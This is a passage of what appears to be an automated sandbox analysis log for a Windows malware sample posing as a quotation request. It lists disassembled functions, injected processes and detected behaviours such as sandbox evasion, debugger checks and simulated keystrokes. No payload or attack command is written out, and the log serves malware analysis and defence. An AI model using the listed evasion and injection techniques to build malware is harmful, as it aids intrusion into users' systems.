            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310225F pushad ; ret 1_2_031027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031027FA pushad ; ret 1_2_031027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031309AD push ecx; mov dword ptr [esp], ecx1_2_031309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310283D push eax; iretd 1_2_03102858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310135E push eax; iretd 1_2_03101369
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeCode function: 5_2_037E5A1D push edx; ret 5_2_037E5A57
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeCode function: 5_2_037E7746 pushfd ; iretd 5_2_037E775B
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeCode function: 5_2_037D96FB push eax; ret 5_2_037D9705
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeCode function: 5_2_037DE53E push es; retf 5_2_037DE558
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeCode function: 5_2_037E4CE6 push eax; retf 5_2_037E4CE7
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeCode function: 5_2_037DBCA8 push edx; retf 5_2_037DBCAC
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeCode function: 5_2_037EFCA6 push esp; iretd 5_2_037EFCDF
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04BC27FA pushad ; ret 6_2_04BC27F9
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04BC225F pushad ; ret 6_2_04BC27F9
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04BC283D push eax; iretd 6_2_04BC2858
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04BF09AD push ecx; mov dword ptr [esp], ecx6_2_04BF09B6
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04BC18F3 push edx; retf 6_2_04BC1906
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04BC7AAB push ecx; ret 6_2_04BC7ABE
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_0004F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0004F98E
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000C1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_000C1C41
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-97392
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeAPI/Special instruction interceptor: Address: 1B65B4C
            Source: C:\Windows\SysWOW64\notepad.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\notepad.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\notepad.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\notepad.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\notepad.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\notepad.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\notepad.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\notepad.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0317096E rdtsc 1_2_0317096E
            Source: C:\Windows\SysWOW64\notepad.exeWindow / User API: threadDelayed 9838Jump to behavior
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeAPI coverage: 3.6 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
            Source: C:\Windows\SysWOW64\notepad.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\notepad.exe TID: 2060Thread sleep count: 135 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\notepad.exe TID: 2060Thread sleep time: -270000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exe TID: 2060Thread sleep count: 9838 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\notepad.exe TID: 2060Thread sleep time: -19676000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe TID: 3052Thread sleep time: -70000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe TID: 3052Thread sleep count: 35 > 30Jump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe TID: 3052Thread sleep time: -52500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe TID: 3052Thread sleep count: 38 > 30Jump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe TID: 3052Thread sleep time: -38000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\notepad.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000A68EE FindFirstFileW,FindClose,0_2_000A68EE
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_000A698F
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_0009D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0009D076
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_0009D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0009D3A9
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_000A9642
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_000A979D
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_000A9B2B
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_0009DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0009DBBE
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000A5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_000A5C97
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_029AC520 FindFirstFileW,FindNextFileW,FindClose,6_2_029AC520
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000342DE
            Source: notepad.exe, 00000006.00000002.4129028971.0000000002FD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllN
            Source: iadfuWOlEqeEML.exe, 00000008.00000002.4129399480.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2427458712.000002A6C770C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0317096E rdtsc 1_2_0317096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417883 LdrLoadDll,1_2_00417883
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000AEAA2 BlockInput,0_2_000AEAA2
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_00062622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00062622
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000342DE
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_00054CE8 mov eax, dword ptr fs:[00000030h]0_2_00054CE8
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_01B647B8 mov eax, dword ptr fs:[00000030h]0_2_01B647B8
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_01B65DB8 mov eax, dword ptr fs:[00000030h]0_2_01B65DB8
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_01B65E18 mov eax, dword ptr fs:[00000030h]0_2_01B65E18
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312C310 mov ecx, dword ptr fs:[00000030h]1_2_0312C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03208324 mov eax, dword ptr fs:[00000030h]1_2_03208324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03208324 mov ecx, dword ptr fs:[00000030h]1_2_03208324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03208324 mov eax, dword ptr fs:[00000030h]1_2_03208324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03208324 mov eax, dword ptr fs:[00000030h]1_2_03208324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03150310 mov ecx, dword ptr fs:[00000030h]1_2_03150310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A30B mov eax, dword ptr fs:[00000030h]1_2_0316A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A30B mov eax, dword ptr fs:[00000030h]1_2_0316A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A30B mov eax, dword ptr fs:[00000030h]1_2_0316A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]1_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]1_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]1_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B035C mov ecx, dword ptr fs:[00000030h]1_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]1_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]1_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FA352 mov eax, dword ptr fs:[00000030h]1_2_031FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D8350 mov ecx, dword ptr fs:[00000030h]1_2_031D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D437C mov eax, dword ptr fs:[00000030h]1_2_031D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320634F mov eax, dword ptr fs:[00000030h]1_2_0320634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03128397 mov eax, dword ptr fs:[00000030h]1_2_03128397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03128397 mov eax, dword ptr fs:[00000030h]1_2_03128397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03128397 mov eax, dword ptr fs:[00000030h]1_2_03128397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312E388 mov eax, dword ptr fs:[00000030h]1_2_0312E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312E388 mov eax, dword ptr fs:[00000030h]1_2_0312E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312E388 mov eax, dword ptr fs:[00000030h]1_2_0312E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315438F mov eax, dword ptr fs:[00000030h]1_2_0315438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315438F mov eax, dword ptr fs:[00000030h]1_2_0315438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE3DB mov eax, dword ptr fs:[00000030h]1_2_031DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE3DB mov eax, dword ptr fs:[00000030h]1_2_031DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE3DB mov ecx, dword ptr fs:[00000030h]1_2_031DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE3DB mov eax, dword ptr fs:[00000030h]1_2_031DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D43D4 mov eax, dword ptr fs:[00000030h]1_2_031D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D43D4 mov eax, dword ptr fs:[00000030h]1_2_031D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EC3CD mov eax, dword ptr fs:[00000030h]1_2_031EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]1_2_031383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]1_2_031383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]1_2_031383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]1_2_031383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B63C0 mov eax, dword ptr fs:[00000030h]1_2_031B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h]1_2_0314E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h]1_2_0314E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h]1_2_0314E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031663FF mov eax, dword ptr fs:[00000030h]1_2_031663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312823B mov eax, dword ptr fs:[00000030h]1_2_0312823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A250 mov eax, dword ptr fs:[00000030h]1_2_0312A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136259 mov eax, dword ptr fs:[00000030h]1_2_03136259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EA250 mov eax, dword ptr fs:[00000030h]1_2_031EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EA250 mov eax, dword ptr fs:[00000030h]1_2_031EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B8243 mov eax, dword ptr fs:[00000030h]1_2_031B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B8243 mov ecx, dword ptr fs:[00000030h]1_2_031B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03134260 mov eax, dword ptr fs:[00000030h]1_2_03134260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03134260 mov eax, dword ptr fs:[00000030h]1_2_03134260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03134260 mov eax, dword ptr fs:[00000030h]1_2_03134260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312826B mov eax, dword ptr fs:[00000030h]1_2_0312826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320625D mov eax, dword ptr fs:[00000030h]1_2_0320625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E284 mov eax, dword ptr fs:[00000030h]1_2_0316E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E284 mov eax, dword ptr fs:[00000030h]1_2_0316E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B0283 mov eax, dword ptr fs:[00000030h]1_2_031B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B0283 mov eax, dword ptr fs:[00000030h]1_2_031B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B0283 mov eax, dword ptr fs:[00000030h]1_2_031B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031402A0 mov eax, dword ptr fs:[00000030h]1_2_031402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031402A0 mov eax, dword ptr fs:[00000030h]1_2_031402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov ecx, dword ptr fs:[00000030h]1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]1_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]1_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]1_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]1_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]1_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031402E1 mov eax, dword ptr fs:[00000030h]1_2_031402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031402E1 mov eax, dword ptr fs:[00000030h]1_2_031402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031402E1 mov eax, dword ptr fs:[00000030h]1_2_031402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032062D6 mov eax, dword ptr fs:[00000030h]1_2_032062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DA118 mov ecx, dword ptr fs:[00000030h]1_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DA118 mov eax, dword ptr fs:[00000030h]1_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DA118 mov eax, dword ptr fs:[00000030h]1_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DA118 mov eax, dword ptr fs:[00000030h]1_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F0115 mov eax, dword ptr fs:[00000030h]1_2_031F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov ecx, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov ecx, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov ecx, dword ptr fs:[00000030h]1_2_031DE10E
